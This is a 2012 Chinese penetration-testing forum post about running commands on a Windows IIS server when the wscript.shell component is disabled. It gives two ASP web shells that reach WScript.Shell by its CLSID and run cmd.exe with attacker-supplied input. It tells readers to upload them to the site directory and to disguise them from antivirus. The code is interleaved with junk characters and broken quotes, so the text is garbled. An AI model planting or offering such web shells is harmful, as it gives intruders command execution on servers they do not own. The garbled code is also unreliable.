找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 没有wscript.shell组件提权方法
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2683|回复: 0
打印 上一主题 下一主题

没有wscript.shell组件提权方法

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-10-21 09:08:27 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
  • 可能有很多人,看到关闭了wscript.shell,就感觉没提权的希望了。就会放弃。  F# E$ Q- K6 K& N
  • 一般当闭上面组件时,你上传cmd.exe到上面去是运行不了命令的。运行时会说出错。- X" V0 R* P, U& o1 `2 C
  • 要想让运行命令可以试试这种方法,成功率为五五之数。4 o! w+ u+ \- I
  • 把下面代码复制:) e, E# \: M4 U) u% ?
  • <%
    % i, F1 b' ], I0 a
  • end if# f# D6 Q! l) S2 R8 A& a/ v  P
  • response.write(”"), ~: \: D9 G7 t9 m
  • On Error Resume
    / z7 f% w- t8 N( d0 ^$ g* c
  • Next" K5 A0 ^7 D- H7 x8 z. N# ]
  • response.write oScriptlhn.exec(”cmd.exe /c” & 2 b6 @! C  s5 A1 W8 ]
  • request(”c”)).stdout.readall
    5 C% t+ E6 _% ?* k* f9 C, `; n$ c
  • response.write(”"). d! \- L/ Q, V
  • response.write(”")
    " r/ e6 i0 W, S  B* Q! e. G
  • response.write(”+ V$ z& ]! e$ r! L, K4 @9 @
  • “)) z, |+ E1 \. h# T( ]5 Q
  • response.write(”")
    , I# A  V7 ?( Z
  • %>
    3 B8 V3 s/ B4 Z& \7 z- p  Y- _- K
  • 保存为一个asp文件,然后传到网站目录上去" j4 @+ U& E' V
  • 运行的时候可能会出现两个问题,第一是运行了为什么运行不了命令,这个你可以试着再上传个cmd.exe然后把路径写入上面代码。, ]( x( c, p2 @8 ~
  • 我用此成功运行过cacls命令。( n& g6 l8 K/ x
  • 第二那就是运行时出错,可能限制某些代码执行: P7 ~' q( k$ W7 P3 [9 K% K, ]9 v
  • 无wscript.shell组件提权又一个方法/ n5 m- y$ ?! W, v8 G  R4 T$ b
  • <object runat=server id=oScriptlhn scope=page 8 j( I! I" d6 T- m4 D

  • ( A( X2 o0 |' G* X3 s) d$ P" C; X
  • classid=”clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8″></object>, I- p; X6 G8 g% _
  • <%if err then%> & `8 E9 U; ^% `
  • <object runat=server id=oScriptlhn scope=page 3 H& n$ Y, z5 m! J" A% P1 N- C' D* R
  • & y  C  {/ H6 L2 W8 `
  • classid=”clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B”></object>
    8 I4 j6 R! V1 M/ X7 e
  • <%
    # o: R( a1 n+ O& a
  • end if 8 J9 M( z  p  l* }. S. d
  • response.write(”<textarea readonly cols=80
    * @" o/ A) I6 K- U0 K  e1 ?0 u" V
  • 4 U  m( G3 Q0 v9 L# f
  • rows=20>”) , p4 F8 d; g8 ~
  • On Error Resume Next & q" ^9 \, q, {, V5 ~  p2 }0 U1 q" R
  • response.write ' ^# o/ M# M1 Y

  • : R  x3 |# \9 s, n2 ^
  • oScriptlhn.exec(”cmd.exe /c” & request(”c”)).stdout.readall
    " V5 i; T; O# D* k. x4 ?3 C# J
  • response.write(”</textarea>”) ! V# ?- w/ p' [3 M( x% A
  • response.write(”<form " k- [* q, @5 @

  • 6 c. W5 s8 h2 ~$ w
  • method=’post’>”) 6 D( z5 z. p8 a) S/ x# a8 F) Y0 g
  • response.write(”<input type=text name=’c' # H' `! R" X; W: x$ h. ~
  • - V' G9 c" l8 K+ R
  • size=60><br>”)
    " v" g; w! p' ]( C4 @
  • response.write(”<input type=submit
    ( c( A6 |2 n& d
  • 9 n+ ?  g0 t2 x3 d) t
  • value=’执行’></form>”)
    . K3 w" Z+ z" o, g# j
  • %>
    $ u, @0 N3 f9 U7 S4 P, x1 m. P
  • 保存为ASP,此代码可能被杀,请注意免杀。
    4 j# I; o. o0 s
  • 原理:有些人把wscript.shell改名了,但是clsid没有变,所以调用这个clsid就等于调用ws组建8 v( J6 G! @, u2 V1 U0 {
复制代码
request, server, 成功率

相关帖子
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表